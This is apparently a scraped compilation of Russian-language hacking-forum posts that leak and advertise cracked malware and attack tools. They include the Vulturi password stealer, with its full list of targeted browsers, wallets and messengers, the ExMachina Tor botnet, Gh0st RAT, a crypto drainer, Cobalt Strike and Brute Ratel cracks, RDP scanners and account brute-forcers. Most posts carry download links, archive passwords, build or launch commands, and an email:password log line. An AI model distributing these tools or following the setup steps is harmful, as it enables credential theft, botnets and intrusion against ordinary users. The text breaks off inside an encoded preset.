Windows Subsystem for LinuxClick to expand...
Wifi
Wireless Network
Autologon
MSCache
Credential Files
Credman
DPAPI Hash
Hashdump (LM/NT)
LSA secret
Vault Files
Автор: frfen
Скачать:
You must have at least 1 message(s) to view the content.
Сливаю склейщик Анубиса, который на експе продавали за 3к$
Как там писали в теме продажнике:
"Предлагается склейщик Анубиса с любым белым приложением. Цена 3К. Полный ФУД
на вирустотале. Больше вам не нужно криптовать файлы!!! И кормить сервисы
крипта.
Не знаю на сколько это так, я пробовал склеить Анубис с тем приложением, которое уже там было. Все ништяк, работает. С другими клеить не пробовал т.к. мне он без надобности.
Всяким там любителям халявы пишу, что не надо в теме или лс просить личный,
даю только тем у кого немного не хватает до хайда, остальным просьба не
писать.
Хайд делается для того, чтобы увидеть, скачать могли активные пользователи,
которые приносят пользу форуму в его развитии.
You must have at least 100 reaction(s) to view the content.
Не ищу работу, просто интересует ваше мнение. Есть желание реализовывать качественный софт в недорогом паблик-сегменте ($100-$200)
Разработка старая, давно уже походила по форумам. Но потенциал который в данном софте заложен - не мал.
Есть 3 вкладки:
По умолчанию 5 поисковиков, парсить можно каждый по очереди (просто установив галочки).
Имеется редактор поисковиков под парсинг - можно отредактировать существующие проекты, либо создать свои - к примеру под парсинг какого либо dating'а или freelance портала.
Нет поддержки куков и не имеется поддержки прокси(кнопка есть - но сама функция не работает), многопоточный.
Обычный парсер регулярками текста по загруженным ссылкам, в наличии сразу 5 регулярок, можно создавать свои в небольшом конструкторе, парсить сразу по всем. Поддержка cookies есть, прокси не поддерживаются, многопоточный
Обычные текстовые утилиты
Скачать - https://cloud.mail.ru/public/2M5r/3A775gK91
Проверка на вирусы -
https://www.virustotal.com/ru/file/...4865b3793ed28e1a482dc020/analysis/1512540516/
1)Сохранение блокнутых аккаунтов в отдельный файл
2)Пофиксил большую часть багов прошлой версии
3) Добавил обновление проксей по ссылке через опр. время (значение указывается
в минутах !)
4) Чекает на колл. друзей и колл. групп где есть права : администратора ,
модератора , редактора
5) По многочисленным просьбам добавил лог в сам софт .
6) использовать функцию reBrute Captcha осторожно . Эта функция будет
пробовать авторизоваться до тех пор пока вк не отдаст один из ответов : гуд ,
бед , ошибка .
Ах да , спасибо тем немногим кто кидает донат . Софт живёт только благодаря вам .
10 лучших сканеров уязвимостей для веб-приложений.
[Netsparker](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication-
security%2Fappscan&cc_key=). Это сканер, который поддерживает как обнаружение
уязвимостей, так и их эксплуатацию. Выдает только подтвержденные уязвимости
(после успешного тестирования и эксплуатации).
[ Burp Suite](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - это базовое программное обеспечение Java для сканирования уязвимостей веб-приложений. Он содержит различные инструменты, предназначенные для обнаружения и облегчения атаки. Бесплатная версия доступна с ограниченными возможностями, но может быть приобретена напрямую с годовой подпиской. Бесплатная версия предустановлена в ОС, созданных для тестирования на проникновение, включая Kali Linux.
[Nikto](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - это сканер веб-безопасности с открытым исходным кодом, который выполняет комплексное сканирование веб-серверов. Он может сканировать несколько элементов на серверах, в том числе файлы и версии самих серверов. Он также может проверять конфигурацию сервера, что делает его мощным инструментом для сканирования безопасности сервера и связанных с ним уязвимостей. Этот сканер так же предустановлен в Kali linux.
[W3af](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - известен как очень мощный и гибкий инструмент для поиска уязвимостей веб-приложений. Его простота в использовании сделала его популярным среди специалистов по безопасности и хакеров. W3af содержит множество веб-плагинов для поиска, оценки и эксплуатации web-уязвимостей на сайтах.
[Arachni](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - это полнофункциональная, модульная, высокопроизводительная среда Ruby, призванная помочь тестировщикам и администраторам оценить безопасность современных веб-приложений. Он бесплатный и с открытым исходным кодом (хотя как и многие тут описанные).
[WebScarab](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - то инструмент, доступный любому, кто хочет проверить работу HTTP/HTTPS-запросов в веб-приложении, что позволяет разработчику отлаживать работу ресурса, а специалисту по безопасности выявлять уязвимости в приложении или в дизайне приложения.
[Vega](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - это бесплатный сканер веб-безопасности с открытым исходным кодом и платформа для тестирования веб-безопасности. Работает как под Linux, так и под windows.
[Skipfish](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - еще один сканер web-уязвимостей, созданный никем как сам Google. Это самый популярный инструмент, который сканирует и подготавливает карту сайта путем рекурсивного сканирования в приложении. Полученная карта сайта в дальнейшем может использоваться для обнаружения различных уязвимостей.
[Acunetix](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - известен своей автоматизированной системой обнаружения уязвимостей, таких как внедрение SQL-кода, межсайтовый скриптинг, слабый пароль на страницах аутентификации и т.д. Благодаря своему интерактивному графическому интерфейсу он пользуется высоким спросом у специалистов по безопасности, так как в нем очень удобно готовить отчеты по аудиту.
[AppScan](https://vk.com/away.php?to=https%3A%2F%2Fwww.ibm.com%2Fsecurity%2Fapplication- security%2Fappscan&cc_key=) - сканер web-уязвимостей от фирмы с громким названием IBM. Этот инструмент способен обеспечить тестирование на протяжении всего цикла разработки веб-приложения. Многие профессиональные пентестеры используют этот инструмент для тестирования веб-приложения.
(В ознакомительных целях! Не несу ответственность за ваши действия!)
ButterFly Bot v1.30 Extended
один их продвинутых ботов, использовался при создании ботнет-сети Mariposa
(бабочка), включавшей миллионы машин в 190 странах.
Из рекламного описания:
" BFBOT is the best bot you can buy for price sub 1000 EUR. It has stability,
performance and reliability no other bot can provide. It is enough secure that
you will never have to worry about skiddies stealing your bots. The spreading
rate is the best out of any bot you can buy, and can each 10.000 or more newly
infected PCs per day if you combine it with browsers exploit pack. The
protocol is very reliable and proved to be much better choice than standard
IRC. Besides minimum bandwidth needed to run the botnet, it also greatly
reduces server side resources compared to IRC protocol. Therefore BFBOT server
can hold around 4-5 times more bots! That is not all - you can configure
server to give different commands to bots and command bots from certain
country only. And when your botnet grows to 20.000 and more, polymorphism of
the bot will take care it stays undetected!"
Spoiler: 3 у вас 43
http://rapidshare.com/files/392100130/BFBot.v1.3.0.Extended.Edition.with.Crack-
LEAKiSO-2009.rar.html
MD5: 26965571BF44D6801A8BD64F8296A11F
Без какой-либо гарантии, непроверен. Нельзя исключать backdoor или потерю ботов. Стоит проверить на отладчике, например OllyDbg.
Gh0st RAT 3.6 source code
Для тех кто любит рытся в чужих кодах.исходники трояна Gh0st RAT 3.6 для золотоискателей хорошая находка. сделанно в Китае
Источник:
www.secnull.INFO
[New$paN]
SCREEN:
[mod][GZip:] Линк битый. Прошу залить файл занова или найти рабочую ссылку, после чего обратится в администрацию форума.[/mod]
[mod][Одинокий Волк:] GZip, да он супермод он сам обновит, только когда будет хз, обычно по утрам он...[/mod]
проверьте пожалуйста прежде чем писать. Может точки после ЗИП не поставил или еще какая опечаточка чем орать на весь форум. Я никогда не выкладываю битые ссылки копипастом.
Господа всем привет! Сливаю вам драйнер SpaceX v2. Продают его за 2300$. ТС - обещает активную поддержку 24/7, но почему-то после покупки вас начинают игнорить. Обновления входят в стоимость - но почему-то обновлять софт никто не планирует. ))) Как-то так.
Ссылка - https://anonfiles.com/T8Ae8uio2z5/SpaceX_DRAINER_v2_zip
Мануал по установке - https://teletype.in/@elonlab/SpaceXDRAINERmanual
Так же помогу с установкой ) Телеграмм Savage_logs. Сессия или токс - ПМ.
Желающим отравить благодарность:
ETH - 0x0150D82DB1F4caea591f05AEd968c4b8fde2DDA9
BTC - bc1qrl5hmjyrf0g3nekuu4gcj39zu5zg86gwwycpft
USDT (trc20) - TJa1BCVQY5u2EQp6RRrYr686nQ5pU1zJ72
1.видео и скачать Orcus RAT
v1.9.1
2.видео и Orcus hVNC PoC
Release
p.s да если не работает убейте в диспетчере хром и все :lol2:
Download:
https://bayfiles.com/O1w8Wek0z3/CobaltStrike48_pwn3rzs_cyberarsenal_7z
Password: Pwn3rzs
Mirrors:
- https://anonfiles.com/gcxdW3k7za/CobaltStrike48_pwn3rzs_cyberarsenal_7z
- https://gofile.io/d/hxVqIC
Macfly Antidetect (это формальное название) - на самом деле это набор аддонов
(паблик) для андроида которое данный персонаж предлагает вам купить у него за
550$.
Скачать:
Hidden content for authorized users.
](https://anonfiles.com/31v5g7A6u9/book_openinwordpad_01.07_zip)
anonfiles.com
Вторая моя работа на форуме (крякинг) - парсера Datacol 7.341. То есть это универсальный парсер информации c веб-сайтов. Хотите собрать информацию о товарах интернет-магазина, контакты организаций, объявления по недвижимости, данные из соц. сети? Настройте новую кампанию с помощью мастера, нажмите кнопку Запуск и получите нужный результат. Более подробную информацию о программе можете почитать на официальном сайте программы.
В архиве расположены:
Изменения в программе что были сделаны:
Spoiler: Продажник (Оф. сайт)
Страница покупки универсального парсера Datacol.
web-data-extractor.net
Скачать программу и лодырь к ней
You must have at least 50 message(s) to view the content.
Данный продукт продавался на малоизвестном форуме, в следствии чего получил очень мало продаж (со слов автора было продано 5 копий).Софт написан на C# и обладает довольно внушительным, хоть и по большей части не нужным функционалом(Половину софтов собираемых стиллером я просто не знаю).Браузеры собираются рекурсивно, расшифровка FireFox паролей происходит статически.Логи отправляются в панель, панель написана на python/flask.Лог собирается полностью в памяти, трафик между клиентом и панелью шифруется.В странах СНГ софт не работает.В целом, софт оправдывает свою стоимость в 95$
Spoiler: Продажник
Оригинальная тема: https://ufo****.net/threads/vulturi-2021-passwords- stealer.16440/
Spoiler: Полный список возможностей софта
- All chrome based browsers and profiles
- All firefox based browsers and profiles
- The traffic is encrypted
- Configurable file grabber
- Collecting the archive into memory
without writing any data to disk
- AntiAnalysis (VirtualBox, SandBox,
Host, RDP,
Emulator, Debugger, CIS country)
- Chrome stealer:
- Passwords
- CreditCards
- AutoFill
- Cookies
- History
- Downloads
- Keywords
- Bookmarks
- Firefox stealer:
- Passwords
- AutoFill
- Cookies
- History
- Bookmarks
- Messengers:
- Telegram (session)
- Unigram (session)
- Bettergram (session)
- WhatsApp (session)
- Element (session)
- Signal (session)
- Skype (session)
- Slack (session)
- RamBox (session)
- Psi,Psi+ (accounts)
- Paltalk (session)
- Facebook (contacts)
- TeamSpeak3 (account db)
- Discord (session, tokens)
- Viber (session, contacts)
- Pidgin (accounts, chatlogs)
- Wickr Me/Pro (session,username)
- Email clients:
- Spike (session)
- Outlook (accounts)
- FoxMail (session)
- TheBat! (session)
- PocoMail (session)
- OperaMail (session)
- MailSpring (session)
- SeaMonkey (accounts, cookies)
- Thunderbird (accounts, cookies)
- Password managers:
- 1Password (databases)
- KeePass2 (databases)
- NordPass (databases)
- BitWarden (databases)
- Dashlane (session)
- RoboForm (session)
- Apps:
- Git (credentials)
- Github Desktop (session)
- Ngrok (token)
- Authy (session)
- WinAuth (container)
- WinRar (history)
- Docker desktop (account)
- PHP-Composter (auth file)
- OBS Studio (broadcast keys)
- Utopia Ecosystem (encrypted account containers)
- VPN:
- OpenVPN (profiles)
- NordVPN (accounts)
- EarthVPN (account)
- ProtonVPN (session)
- PrivateVPN (session)
- Proxifier (profiles)
- NO-IP DUC (credentials)
- FTP/SSH:
- WinSCP
- CoreFTP
- TotalCmd
- FileZilla
- MobaXTerm
- SnowFlake
- mRemoteNG
- CyberDuck
- FarManager
- ApacheDirectoryStudio
- Gaming:
- Steam (ssfn, vdf, username, apps)
- Uplay (account information)
- BattleNet (account information)
- Origin (account information)
- KalypsoMedia (account)
- Osu! (session)
- SA:MP (username, servers)
- Minecraft (session tokens)
- VimeWorld (session)
- RedServer (session)
- LavaCraft (session)
- McSkill (session)
- LoliLand (account)
- CryptoWallets:
- DashCore
- MoneroCore
-BitcoinCore
- LitecoinCore
- Bitcoin Knots
- AtomicWallet
- GreenAddress
- Blockstream
- CoinWallet
- Armory
- Coinomi
- Electrum
- Ethereum
- Exodus
- Guarda
- Jaxx
- Zcash
- Wasabi
- BitPay
- Bither
- MyMonero
- System Info:
- Appslist
- Processlist
- Webcam screenshot
- Desktop screenshot
- Active windows screenshot
- Vault passwords (IE, RDP)
- Windows credential manager
- Networks (Saved, Scanning)
- HardwareInfo:
- Screen Resolution
- CPU name
- GPU name
- Manufacturer
- RAM amount
- Processor ID
- Disk serial
- BatteryInfo:
- ACPowerPluggedIn
- Percentage
- NetworkInfo:
- Get local IP
- Get public IP
- Get gateway IP
- Get BSSID
- OSInfo:
- Get OS name
- Get UI lang
Spoiler: Установка
Bash:Copy to clipboard
sudo apt install python3-pip
pip install flask
pip install timeago
pip install requests
pip install maxminddb
sudo python3 main.py
Не устанавливаете модуль через pip install -r requirements.txt , модуль uwsgi содержит лицензионную систему данной панели!
Установка панели:
Создание билда:
Скачать можно тут: <https://anonfiles.com/H8dcK129u8/VulturiCracked_lamp- ret.fun_zip>
RDP Solid Scanner - программа для сканирования диапазонов айпи, диапазонов портов, основанная на Масскане.
Особенность программы в том что после сканирования по диапазону портов ( например 3350-3500 ) вы сможете чекнуть на коннект по RDP-протоколу все найденные нестандартные открытые порты, тем самым вы сможете поймать чистые и не брученные сервера на рандомных портах.
Возможности программы:
- Сканирование IP как одиночных так и по диапазонам
- Сканирование портов как одиночных так и по диапазонам
- Чек найденных открытых IP:Port на коннект по РДП-протоколу.
Софт без привязки, то есть его можно использовать на неограниченное количество машин.
Тестирование производилось на Windows Server 2008 и Windows 7.
Рекомендуется чекать на РДП-коннект на компьютеры где не установлено
обновление KB2592687 (ниже Windows 8). Если это обновление присутствует,
удаляйте ее. Google подскажет как удалять ненужные обновления Windows.
При тестировании в диапазоне 3350-3500 портов где-то 30-40 % найденных серверов были с нестандартными портами RDP.
Также для самого актуального брута RDP Brute by Z668, который не принимает списки IP:Port, сортировщик портов, с которым после скана/чека, сможете разбить IP по файлам, в соответствии с их портами.
Думаю, самое время слить не самых сложных, но вполне достойных и работоспособных ботов под ваш магазин в Тг. Создание подобного с нуля обойдется в 5-10к рублей - оно вам надо? Если можно скачать это бесплатно.
В комплект входят:
1. Универсальный бот-магазин
2. Бот под продажу ответов ОГЭ и ЕГЭ
3. Бот под продажу снюса
Работать по-белому или скамить даунов - решать только тебе!
Hidden content for authorized users.
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
cloud.mail.ru
Spoiler: Описание
Y Browser - Софт предназначенный для ускорения и облегчения работы с cookies. Это обычный chrome, чуть более безопасный с точки зрения анонимности, с возможностью импорта cookies в разные сессии, то есть вы можете начать 2 разные сессии с разными или одинаковыми cookies. У программы есть встроенный конвертер из netscape формата, то есть прежде чем начать работу с cookies вам не нужно ничего конвертировать менять и редактировать, просто загружаете файл с cookies в том формате, в котором хотите JSON или Netscape.
Пример Netscape cookies:
Code:Copy to clipboard
www.googleadservices.com FALSE /pagead/conversion/978575253/ FALSE 1568051618 Conversion EhMIxMr3z__h4gIVEUMYCh2lhACzGAEgrMCm0oiptPGFAUgBkAHwlOu9hQmYAQQ
.zaka-zaka.com TRUE / TRUE 1591815966 __cfduid d62ff7ab4f70a9ba4950135e735108e3c1560279966
www.googleadservices.com FALSE /pagead/conversion/774124383/ FALSE 1568056026 Conversion EhMIl4PAhZDi4gIV1MAYCh3LHgnqGAEg-paI8rb6xfFNSAGQAcu_1eivCJgBAA
.gta-nakrutka.ru TRUE / FALSE 1623352031 _ga GA1.2.1160236597.1560280027
.gta-nakrutka.ru TRUE / FALSE 1568056027 _gac_UA-130980994-1 1.1560280027.EAIaIQobChMI28mDhJDi4gIVkeiaCh19KgB6EAAYAiAAEgKBQvD_BwE
gta-nakrutka.ru FALSE / FALSE 1591816048 jv_visits_count_AGfow6fGlj 1
www.googleadservices.com FALSE /pagead/conversion/829022076/ FALSE 1568057040 Conversion EhMI17Oj6ZPi4gIVx8CyCh3F3wTrGAEgt-uXtoe_wJVgSAGQAdj-k6r_CJgBBA
.imrworldwide.com TRUE / FALSE 1593978809 IMRID 44a32704-ef8d-4f55-bd56-61d040fe7899
.bing.com TRUE / FALSE 1593978815 MUID 039180085F4B62B01FBC8D705B4B611D
.brealtime.com TRUE / FALSE 1591818813 __cfduid d370dc2382372044f083ac9aa67e3b3c91560282812
.speedtest.net TRUE / FALSE 1623354809 __gads ID=36d6681ca33b17eb:T=1560282809:S=ALNI_MYoH5FTiKXzgrhhNM5cfyGGhg2Juw
.go.sonobi.com TRUE / FALSE 1563090812 __uin_eb CAESEOZ5FzS_fqJ7rAqX06jJqxM||1
.go.sonobi.com TRUE / FALSE 1563090812 __uin_mm cefb5cfd-2d9f-4a00-892f-9deebee8580f
.go.sonobi.com TRUE / FALSE 1563090812 __uin_rx RX-b458bdf3-5194-445e-9568-ced85ce185ee
.go.sonobi.com TRUE / FALSE 1563090812 __uin_td 608a699a-7e03-4ca8-a7fe-ad30a4848f31
.bidr.io TRUE / FALSE 1594396410 bito AAUC8U66AA0AABfLj_mnGA
.onaudience.com TRUE / FALSE 1591818814 cookie ab56285f21d6ee4d
.zdbb.net TRUE / FALSE 1575834808 h_zdbb 444fc1e400e24b1eaf379035872a6ee8
.m6r.eu TRUE / FALSE 1568058811 id 4a983c6692f1f1ef69a9813d992fe50e
.justpremium.com TRUE / FALSE 1562961213 jpxumaster um-16306173-485f-4b71-a2b4-4c049239c469-1560282813
.zdbb.net TRUE / FALSE 1562874812 kruxtpid 1
...
Пример JSON cookies:
Code:Copy to clipboard
{
"domain": "accounts.google.com",
"expirationDate": 1594480575,
"hostOnly": false,
"httpOnly": false,
"name": "GALX",
"path": "/",
"sameSite": null,
"secure": false,
"storeId": null,
"value": "3rN7L22CiMs",
"id": 0
},
{
"domain": ".dmg.digitaltarget.ru",
"expirationDate": 1594480575,
"hostOnly": false,
"httpOnly": false,
"name": "visessid",
"path": "/",
"sameSite": null,
"secure": false,
"storeId": null,
"value": "f9ff68a2_15a0383c6b2_00000000002da0fc",
"id": 0
},
{
"domain": ".yandex.ru",
"expirationDate": 1594480575,
"hostOnly": false,
"httpOnly": false,
"name": "yandexuid",
"path": "/",
"sameSite": null,
"secure": false,
"storeId": null,
"value": "2851885251487238041",
"id": 0
},
...
В браузер установленны самые нужные расширения для работы, user-agent switcher
Y Browser умеет проверять cookies на наличие определенных ссылок, достаточно один раз добавить все ссылки в список для проверки и каждый раз, когда вы будете добавлять новые cookies программа будет выдавать вам список из указанных вами доменов в порядке набольшего кол-воа совпадений в файле. То есть - программа проверяет на наличие и считает кол-во совпадений например если в ваших cookies много значений "store.steampowered.com" вы увидите его в списке со значением "Exists - True" и "Amount - кол-во совпадений". Видя этот список вы сразу будете понимать есть ли в ваших cookies сессии на определенных сайтах, а по кол-ву можно примерно понимать сколько сессий ( аккаунтов ) есть в этих cookies.
Вы можете изменить стартовую странницу в браузере например если вы предпочитаете сразу проверить наличие сессии в steam можно поставить ссылку на steam store или инвентарь профиля. Так же в программе вы можете настроить пользовательский интерфейс и убрать ненужные вам элементы. В настройках есть возможность отключить ненужные расширения, например если вы предпочитаете разгадывать копачу от google вручную, то просто поставьте галочку в настройках напротив текста -" remove recaptcha solver ". Так же есть возможность выключить звук браузера.
Если программа получит отклик и вы останетесь ей довольны, мы обязательно продолжим ее разработку, в будущем запланировано добавить автоматический парсинг данных с соц. сетей в определенной сессии и возможность автоматизации действий по типу: поставить лайк , комментировать и т.д.
Скриншоты:
VT
Скачать -
Mega
Скачать - ЯндексДиск
Telegram канал где вы можете узнать о других разработках -
click
Привет, ребята.
Ищу софт "Мередиан" и "Легенду" от "Сонар-Плюс" -
https://www.sonarplus.ru/index.php?page=products&id=union
Буду очень признателен за софт.
Слив софта с зарубежного форума hackforums ( не реклама )
Проверено на клиентах 1k ++
Стабильное соединение
Исходный код
dotNET4.0
Асинхронный
Multi-Hosts
Мульти-порты
Отправить файл и выполнить его на диск или в память [RunPE & Reflection]
Что включает в себя софт
Терминал доступа для контроля юзеров
Конфигурируемый клиент, управляемый через терминал
Сервер регистрации, записывающий все значимые события
Экран просмотра и записи пк юзера
Антивирус и менеджер целостности юзера
Доступ к SFTP юзера, включая загрузку и скачивание
Окно чата клиента и сервера
Клиентский динамический DNS и поддержка нескольких серверов (настраивается)
Стиллер данных юзера
Клиентский JIT-компилятор
Кейлоггер
Анти-анализ юзера (настраивается)
Управляемые сервером обновления
Запуск антивирус юзера
Редактор конфигурации сервера
Многопортовый серверный приемник (настраивается)
Миниатюры сервера
Бинарный серверный сервер (настраивается)
Обфускатор сервера (настраивается)
И многое другое!
Скачать: Яндес (пароль: cracked ) | AnonFile (пароль: cracked ) Скан на вирусы Исходники проекта
Целый пакет RAT/DDoS файлов
// Автор: Bulb1992
(а также выделяю респект всем кто делал эти программы, эти ратники, ддосеры не
мои. клиент мой)
Привет всем, это Bulb1992. На этом форуме что ли никто не сидит? Обидно. Актива нету. Решил зайти на форум, делать было нечего. Так что вот решил запостить о ратниках, ддосеров. Прям на целый пакет не хочу выдавать ссылку, я хочу тоже респект получить, так что я создал клиент так свой, хз... Просто простенький софт созданный на DevelNext. Просто тупо уже валяются ратники, ддосеры - столько их накачал что ужас. Может кому то еще понадобится. Буду рад если оцените мой пост, ну ведь я тоже старался в DevelNext хыхы (Для супер мамикнов хацкеров, я знаю что тупо прогу на DevelNext создать на 2-3 минуты можно) Я передумал, чтобы качать прямо вам нужно кое шо сделать
Скачать пакет в моем клиенте:
Hidden content for authorized users.
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
Spoiler: VIRUSTOTAL
](https://www.virustotal.com/#/file/778f6865d6b70d64b77b91818adbdea9d213c81c3d8c45cfe392d49bb86b834c/detection)
![www.virustotal.com](/proxy.php?image=https%3A%2F%2Fwww.virustotal.com%2Fui- public%2Fimages%2Fflag.png&hash=cc82361882fedf050c83a9441078cecf&return_error=1) www.virustotal.com
**Прямая ссылка:
[CLIKE]
](https://mega.nz/#!TLAlQITI!zHzyO1XcMpLEshX6BZUP6z5d0hoGJGUMQjarwHyeVl8)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
Spoiler: VIRUSTOTAL
](https://www.virustotal.com/#/file/66f9a32c603ed4c477512e782cc542ce939255fd1e80cfd674e0989372c88553/detection)
![www.virustotal.com](/proxy.php?image=https%3A%2F%2Fwww.virustotal.com%2Fui- public%2Fimages%2Fflag.png&hash=cc82361882fedf050c83a9441078cecf&return_error=1) www.virustotal.com
**
Spoiler: SS
https://postimg.cc/rz14QY4L , https://postimg.cc/MMyn3vvY , https://postimg.cc/21MdPLSp
Hidden content for authorized users.
Мой Дискорд: GbNQfU2eo.Exe#2901
Мой профиль на YOU GAME.BIZ: https://yougame.biz/members/173981/
Если у кого ошибка
то установите
https://www.microsoft.com/en-us/download/details.aspx?id=48145
SMS BOMBER BY FSOCIETY.DAT!
Spoiler: Что это за товар?
SMS BOMBER - засоряет SMS сообщениями номер введённый вами в софте.
200 рублей за обычную версию(5 сервисов).
250 рублей за Plus версию(14 сервисов).
Spoiler: Условия оплаты?
Согласен на гаранта за ваш счёт.
2 типа оплаты.
Spoiler: Связь
Телега - @young_odee
БОМБЕР РАБОТАЕТ НА ВСЕХ УСТРОЙСТВАХ И ОС!
На проверку готов.
[1] 2 типа работа : Brute или Checker
[2] Работа возможна как по сайту так и по API
[3] Чекает на колл. друзей и колл. групп в которых есть права админа ,
модератора , редактора ...
[4] Замороженные аккаунты сохраняются в отдельный файл
[5] Есть возможность добавлять свои UserAgent,ы . Софт на каждый запрос будет
брать рандомный из файла
[6] Возможно добавлять прокси по ссылке
Пример лога
themastermind2007@yahoo.com:5611871a
Friend: 2
Groups: 0Click to expand...
BOOT KIT is a project related to custom boot sector code subverting Windows NT Security Model.The sample is available in the vault that keeps on escalating cmd.exe to system privileges every 30 secs.
It has several features
The bootkit has been tested with a number of kernel mode shell codes such as
Loading Native Applications and drivers from the shell code
creating a kernel ,which periodically raises every CMD.EXE to system
privileges.
The Source code will contain 4 levels of BOOT KITs(showcasing different payloads)
Basic version source has already been uploaded.
**[$]W3lc0m3 L33t H4x0rzz
RU:**
Нашел кряк брут рейтала проверил запустил сервер зашел через клиент все
работает payload 'ы так-же билдятся
проверил лишь в локалке так и не смог разобраться с откликом от барсуков
можете попробывать сами в виртуалке или
деде, проверял лишь на своем kali, есть 2-версии linuxamd64 и linuxarm64.
P.S это недавний кряк с 2022-года
UPD:чтобы запустить brute-ratel нужно прописать команду:
Code:Copy to clipboard
./brute-ratel-linx64 -ratel -a admin -p password -h IP(LOCAL) -sc cert.pem -sk key.pem
EXAMPLE
./brute-ratel-linx64 -ratel -a brute_user -p huynya -h 192.168.0.101:1337 -sc cert.pem -sk key.pem
После этого дайте права 'commander_runme'
Code:Copy to clipboard
chmod +x commander_runme
./commander_runme
EN:
Our systems have detected unusual traffic from your computer network. This
page checks to see if it's really you sending the requests, and not a robot.
Why did this happen?
Found a crack brute reytal checked launched the server went through the
client everything works payloads are also built checked only in LAN and could
not figure out the response from the badgers.
you can try it yourself in a virtual machine or dedicated server , I only
checked it on my kali, there are 2 versions of linuxamd64 and linuxarm64.
Link to download:
ANONFILES
PASS: xss
**Do not buy source code from anyone !
Due to attempts to sell my source code I am releasing it for general use . **
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/dd4a8d97e3d2afc8/#_bEhF-Ke4Xiocr9ctGnjVA)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
Password : @WinstonAndroid
Привет, друзья, представляем ExMachina — ботнет для Windows, Клиент написан на
языке программирования Golang, а сервер управления выполнен на языке Python с
использованием веб-фреймворка Flask. , который использует сеть Tor для связи с
ботами.
Функции:
- Анонимный C2C-сервер благодаря сети Tor
- Прослушивание ввода с клавиатуры пользователя
- съемка скриншотов
- Запуск команд PowerShell
- попробуйте убить процессы защитника Windows
Отмечает, что этот проект еще не завершен, так как требуется дополнительное
тестирование для обхода всех существующих антивирусов, поэтому список дел -
это улучшение кода, чтобы он обходил все возможные антивирусы, и добавление
функции для запуска зашифрованного шелл-кода.
for the hardware you need a server for at least 4GB of ram and 2cpu cores, as
for the software: Tor, nginx(optional), python, and Go
использовать:
настроить скрытый сервер tor
закодируйте весь адрес onionv3, веб-перехватчик Discord и имя исполняемого
файла, потому что он попытается самостоятельно удалить
отредактируйте main.go, добавив новые данные в кодировке Base64
Bash:Copy to clipboard
cd ExMachina
GOOS=windows go build -ldflags="-w -s -H=windowsgui"
выходной исполняемый файл составляет около 6,5 МБ
запустите сервер, запустив python wsgi.py(for debuging and testing python
test.py), зарегистрируйте администратора (по умолчанию имя пользователя
администратора — «ErenYeager», вы можете изменить его, если хотите) перейдите
по маршруту /register и зарегистрируйте пароль администратора
наслаждаться
**Автор student /
мой_телеграмм_канал
Источник: https://xss.is
**
Bruteforce m.stepn.com написанный на JavaScript
Это еще один мой авторский проект написанный полностью на JavaScript на движке
A-Parser. Запускаем A-Parser, импортируем пресет, загружаем файл в котором
хранятся email:password, запускаем. Инструкция ниже
---пресет---
Code:Copy to clipboard
eJx1VW1z2jgQ/is6TRrMhDEhuZc5Z5ge5UovnRRyDZ18wKQj7MU4kSVXkiEZjv9+
K9lgh7vwBbQvz+4++8KWGqaf9K0CDUbTYLaluftNAxoWF73er+Ty959/ox2aM6VB
WZMZHYMJgr+m01uUx7BkBTe0s6XmJQf0k2tQKo0BlWmM70TKeCjde814gSazi/Pz
+a7hkZtUCr13iFYQPQ2lMCBM7UQftv7Z7gQFLI5T68A4DbavrL8wE62mDrS3272d
0uIlZ1oPuSziEWcKhisls0aCRhWwm887FLnA4vRIqoxZTmbvyCPpEyMl176j5PPd
ZOzlPT9mhrWvQhGK6xH56dHPdOJnNh2vdS0iqRREhhRIoWAZhGHXJrCRKm45J/Oj
APXiS5Um5DvxXrl/kjLhQAaFWWGJacSMVK02eU9a5B/SULZIQFqo+E5CGiImReCP
4z/Juzk9FHLH1jCVWMgy5VCLR/gaY16oOMFCwGr9pSvaa/vm2bxivWTDjkLN0DeR
/nBdEhJtbTUp6BGyiiIDDsCVuGdyRlfG5Drodlme8oWvDeTCj2TWVYXocpmk4j2L
IlkI0z9xnqd7xvpsEeHUJae2uf3L0xjWaQTXYin7G1hQzKlwyfxdJkGDJeMaOlRj
7SOGlcXHmtSAsqxOqjnEqZJiwPkNrIHXZi6ND0XKY1yEwRKdrivH/zeZ/Adjd+Cr
GQqHc6MwhwOKe32YfKm9YnkjE6QyXiCRPM1Sg289tPSg9ByFTwD5oQlj24RMKjiE
qZCr6LjvOQi7CfUMDPJa9KoMdxW0LFRkoZ0KTarNUpDAswOx37ik3uwhmJ+1A88/
a+/l5UaKgnP0k7b5Jcp8Vw9QIxoKIymWaTKp1nY/aoWY4rWaiKHMcg7mgIlr9bUe
5IGu+msfdeXHzkMXwnK6v2DUrfXnu5KDXKWY6i82wQxb1IxaQUaM829fb5oa66iN
zCfio1JHc+EmjsIzs8Z/JBmOoh34oHdxSS2YgUQiKViqpaW6t4fLvG1c3WCLx40+
6tvSxtZpLXbNCpaFiGzvydSKvDbZhmJnz9O0vF1KGml76Osiw4u2N/dYhyycMcGP
